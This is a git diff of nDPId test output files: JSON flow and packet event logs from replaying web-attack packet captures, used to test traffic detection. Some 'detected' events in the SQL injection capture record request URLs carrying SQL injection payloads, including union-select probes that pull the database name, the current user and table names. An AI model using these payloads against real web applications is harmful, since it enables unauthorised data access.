+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277867,"flow_last_seen":1576420277867,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277870,"flow_last_seen":1576420277870,"flow_idle_time":7560000,"flow_min_l4_payload_len":188,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":188,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277871,"flow_last_seen":1576420277871,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277873,"flow_last_seen":1576420277873,"flow_idle_time":7560000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":186,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277874,"flow_last_seen":1576420277874,"flow_idle_time":7560000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":189,"flow_tot_l4_payload_len":189,"flow_avg_l4_payload_len":189,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277875,"flow_last_seen":1576420277875,"flow_idle_time":7560000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277877,"flow_last_seen":1576420277877,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":735,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277878,"flow_last_seen":1576420277878,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277880,"flow_last_seen":1576420277880,"flow_idle_time":7560000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":182,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":737,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277882,"flow_last_seen":1576420277882,"flow_idle_time":7560000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277883,"flow_last_seen":1576420277883,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":739,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277885,"flow_last_seen":1576420277885,"flow_idle_time":7560000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277887,"flow_last_seen":1576420277887,"flow_idle_time":7560000,"flow_min_l4_payload_len":166,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":166,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":741,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277889,"flow_last_seen":1576420277889,"flow_idle_time":7560000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277890,"flow_last_seen":1576420277890,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277892,"flow_last_seen":1576420277892,"flow_idle_time":7560000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277893,"flow_last_seen":1576420277893,"flow_idle_time":7560000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":187,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00571{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","packets-captured":797,"packets-processed":797,"total-skipped-flows":0,"total-l4-data-len":138401,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":797,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":797,"total-idle-flows":797,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":3191,"global_ts_msec":1576420278014} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 797/797 diff --git a/test/results/WebattackSQLinj.pcap.out b/test/results/WebattackSQLinj.pcap.out index fc108d36a..3fc3b32a0 100644 
--- a/test/results/WebattackSQLinj.pcap.out +++ b/test/results/WebattackSQLinj.pcap.out 
@@ -1,59 +1,59 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1499348407419} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348407419,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348407419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84aRAAD4G5CusEAABwKgKMo1kAFAWk4RJAAAAAKACchDPRwAAAgQFtAQCCAoBPmXtAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499348407419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWS7EzBkFpOESqAScSCpZgAAAgQFtAQCCAoD6DdgAT5l7QEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499348407420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348407420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04aVAAD4G5DKsEAABwKgKMo1kAFAWk4RKuxMwZYAQAOVIbgAAAQEICgE+Ze0D6Ddg"} 
-00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348413192,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348413192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/kNAAD4Gx4ysEAABwKgKMo1mAFAV3ZXTAAAAAKACchC4zgAAAgQFtAQCCAoBPmuQAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499348413192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWbwopjJFd2V1KAScSDvVQAAAgQFtAQCCAoD6D0DAT5rkAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499348413193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348413193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/kRAAD4Gx5OsEAABwKgKMo1mAFAV3ZXU8KKYyoAQAOWOXQAAAQEICgE+a5AD6D0D"} 
-01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348413192,"flow_last_seen":1499348413193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":460,"flow_tot_l4_payload_len":460,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1499348413193,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348422024,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348422024,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8A7ZAAD4GwhqsEAABwKgKMo1oAFD9gXeGAAAAAKACchDm1AAAAgQFtAQCCAoBPnQwAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499348422024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348422024,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWik93fQ\/YF3h6AScSCBYAAAAgQFtAQCCAoD6EWjAT50MAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499348422025,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348422025,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0A7dAAD4GwiGsEAABwKgKMo1oAFD9gXeHpPd30YAQAOUgaAAAAQEICgE+dDAD6EWj"} 
-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348422024,"flow_last_seen":1499348422025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348422025,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348433464,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348433464,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WwtAAD4GasWsEAABwKgKMo1qAFDC1CRXAAAAAKACchBpgwAAAgQFtAQCCAoBPn9cAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499348433464,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348433464,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWqDJLV7wtQkWKAScSDdCgAAAgQFtAQCCAoD6FDPAT5\/XAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499348433465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348433465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WwxAAD4GasysEAABwKgKMo1qAFDC1CRYgyS1fIAQAOV8EgAAAQEICgE+f1wD6FDP"} 
-01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348433464,"flow_last_seen":1499348433465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348433465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348467295,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348467295,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NrBAAD4GjyCsEAABwKgKMo1sAFAXzJbWAAAAAKACchCBAAAAAgQFtAQCCAoBPqBmAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499348467295,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348467295,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWwuedQjF8yW16AScSAJgQAAAgQFtAQCCAoD6HHZAT6gZgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499348467296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348467296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NrFAAD4GjyesEAABwKgKMo1sAFAXzJbXLnnUJIAQAOWoiAAAAQEICgE+oGYD6HHZ"} 
